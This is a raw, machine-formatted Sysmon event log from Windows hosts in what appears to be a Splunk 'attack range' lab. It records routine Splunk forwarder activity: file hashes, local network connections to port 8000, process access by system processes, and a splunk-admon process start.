23542300x8000000000000000215316Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:53.632{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A1DA81C2B27AE38E0FE0D28A28233A4,SHA256=EAC569B7767495441838ECDA650B809E6F25A4F1EE20064FEDE3BE198BAD4912,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286329Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:53.259{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF0848F2E0E955E1B17969D4BD8227C2,SHA256=0D7575FF2372AA7D8F394ECAAC213B0900480BAFC55B2CCFE30C4E0D84110808,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215317Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:54.757{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACECB3DB5056010E9F69D53001408A58,SHA256=B3E082EB4BFE4347BCBEF931F659B2D5CC2A66BAB0BEEE6A91BB7C3C32654913,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286331Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:52.609{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53325-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286330Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:54.275{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D3E0F63214AF3AC05F1813E26554AFB,SHA256=B90E4996F4B2245F3ACB7C0E5FD96B60FDAEAD8CDE4C580B11048B323B24C507,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215318Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:55.772{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=962D62104C0AE5790C29F7CD615197DB,SHA256=D40D30606DF2AE546862B3064DC3022241DEEC24F2CC952A3F90F2B8B7E86171,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286332Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:55.275{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49B56CDF91EA26AE9AE0F1B16C14829E,SHA256=6BCAF4DBA4F915243F3F918ED288DC9ACAC49C7E0B2B34D9D7D41A689B58531D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215319Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:56.788{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBCEE9F1169F06B5BBA8BF5E6C541593,SHA256=B9D34932243587E82060415B2BA847B1541EE401426BE519E3ED671816BF916B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286333Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:56.368{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C698B8BDA48649B6ED9362D7EDFC3B7,SHA256=2F0495D25347499CDDE9E012BA7C8539014F9E470F4845E4290CF7F3452E2A5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215321Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:57.835{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38ED3506F88F8A7DCB02345FA597B29F,SHA256=67E3D64380AAE351D4423B65EFD10FEA740D48D6F271C7D07B81AFB3CB5B509C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286334Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:57.400{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73375CA437C9F1A592B87C4AC4DB3E8D,SHA256=05C7F8D17644939146B1F1D9929BBEA0D63D221D080A21B2C86FD30C09A7CF7A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215320Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:55.493{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51247-false10.0.1.12-8000- 23542300x8000000000000000215322Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:58.850{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D464AC68ACA6EF535E304A641AD17176,SHA256=D5FA4A539971AE05353FC9E1785320317A834DFF3F27BF521001A31B68992D76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286335Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:58.540{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=343BA2E3FC88BB7563C5888CE8A957F0,SHA256=5BC3D98CDF57034DD1B066DDF8C0D920C849EC14360EBC6B6BA4CB8DAA6DA072,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215323Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:59.897{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EF6068D1ED981CCF92B35DFEE4CA92C,SHA256=767A68512A284DB64E900068D8023F043FA251D88F5431E96E0D551DADCD8EA5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286337Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:57.609{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53326-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286336Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:59.665{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBDEBDBB3B28CBD1D4A6E716DC7FACCF,SHA256=BC559E9C79EEA85844045EFF8150846B3D4536ABB508D8FF46B93A530BD8385A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215324Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:00.944{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F47D3AE180581871CF5505D94E2475B,SHA256=DB00012D07DF62F9CAEDA4F6FB0154C7E9A5DC9BD8E9E43BE83887909AD8F8A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286338Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:00.681{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41770293EADE417B1BD8AC79732BD965,SHA256=7AC8D288C988D9902817534166F7EFDACB87974BDC3161542055DCC8600A01A3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286347Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:01.759{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0FB5-6216-D304-000000003802}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286346Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:01.759{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286345Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:01.759{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286344Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:01.759{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286343Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:01.759{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286342Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:01.759{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0FB5-6216-D304-000000003802}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286341Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:01.759{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0FB5-6216-D304-000000003802}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286340Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:01.760{C8EA50B7-0FB5-6216-D304-000000003802}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286339Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:01.681{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21C3354CC495DD5AA380E13C30988223,SHA256=F4DDC221B1095E38A37EA2B486E835E6A314FE72E638DAD700CE1BD17C89ECF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286357Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:02.697{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A70FA9AA6BEB971CB05F9E1D049C6781,SHA256=27320E6270DF5BAA304B5B5420B95257451AE4629B2C57795FDE602F190439C8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215326Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:00.586{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51248-false10.0.1.12-8000- 23542300x8000000000000000215325Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:02.163{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5204BF289040AC77EB44CD8092CB0F3E,SHA256=F53B6DD633B258097244EC1B4FF5EDB4D1218389DDF970D2DF2ACF5723FB6B92,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286356Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:02.259{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0FB6-6216-D404-000000003802}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286355Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:02.259{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286354Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:02.259{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286353Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:02.259{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286352Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:02.259{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286351Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:02.259{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0FB6-6216-D404-000000003802}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286350Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:02.259{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0FB6-6216-D404-000000003802}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 